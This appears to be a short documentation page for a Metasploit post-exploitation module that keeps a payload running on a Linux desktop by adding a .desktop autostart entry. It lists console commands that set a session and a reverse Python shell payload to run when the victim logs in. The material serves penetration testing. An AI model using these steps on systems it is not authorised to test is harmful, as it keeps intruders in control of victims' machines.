485 B
485 B
Autostart persistence
This module persist a payload by creating a .desktop
entry for Linux desktop targets.
Testing
- Exploit a box
use exploit/linux/local/autostart_persistence
set SESSION <id>
set PAYLOAD cmd/unix/reverse_python
(for instance), configure the payload as neededexploit
When the victim logs in your payload will be executed!
Options
NAME
Name of the .desktop
entry to add, if not specified it will be chosen randomly.